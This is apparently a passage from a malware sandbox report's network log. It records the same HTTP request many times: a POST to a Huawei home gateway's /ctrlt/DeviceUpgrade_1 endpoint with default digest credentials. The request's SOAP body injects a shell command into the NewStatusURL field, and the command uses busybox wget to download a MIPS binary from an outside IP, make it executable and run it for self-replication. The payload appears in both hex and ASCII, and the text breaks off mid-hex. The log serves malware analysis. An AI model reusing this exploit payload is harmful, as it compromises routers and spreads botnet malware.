61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 